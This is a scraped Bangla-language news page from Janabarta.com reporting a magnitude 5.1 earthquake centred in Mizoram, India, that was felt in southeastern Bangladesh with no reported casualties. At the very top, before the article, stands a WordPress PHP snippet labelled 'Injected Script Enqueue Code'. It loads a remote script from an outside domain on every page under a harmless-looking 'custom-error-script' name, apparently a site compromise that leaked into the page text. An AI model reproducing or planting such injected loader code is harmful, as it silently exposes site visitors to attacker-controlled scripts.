// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ভূমিকম্পে কাঁপলো দেশের দক্ষিণ-পূর্বাঞ্চল - Janabarta.com

ভূমিকম্পে কাঁপলো দেশের দক্ষিণ-পূর্বাঞ্চল

নিজস্ব প্রতিবেদক: ভারতের মিজোরামে উৎপত্তি হওয়া মাঝারি মাত্রার ভূমিকম্প বাংলাদেশের দক্ষিণ-পূর্বাঞ্চলেও অনুভূত হয়েছে। তিন পার্বত্য জেলা এবং চট্টগ্রাম মহানগরী ও এর আশপাশের উপজেলাগুলোতে এই ভূমিকম্প অনুভূত হয়েছে বলে স্থানীয় সূত্রে জানা গেছে।

মার্কিন ভূতাত্ত্বিক জরিপ সংস্থা ইউএসজিএস জানিয়েছে, বাংলাদেশ সময় রোববার বিকাল ৫টা ৪৬ মিনিটে এই ভূমিকম্পের উৎপত্তি হয়। রিখটার স্কেলে যার মাত্রা ছিল ৫ দশমিক ১।

মিজোরামের ডারলন থেকে ৩৮.৫ কিলোমিটার দক্ষিণ-পূর্বে এবং ভূপৃষ্ঠ থেকে ৪০.৪ কিলোমিটার গভীরে ভূমিকম্পটির উৎপত্তি হয়।

ভূমিকম্পের উৎপত্তিস্থল চট্টগ্রাম থেকে ২১৩ কিলোমিটার উত্তর-পূর্বে। আর মিজোরাম আইজল থেকে ৪০ কিলোমিটার উত্তর-পশ্চিমে।

তবে এ ভূমিকম্পে তাৎক্ষণিকভাবে বাংলাদেশ বা ভারতে কোনো হতাহত বা ক্ষয়ক্ষতির খবর পাওয়া যায়নি।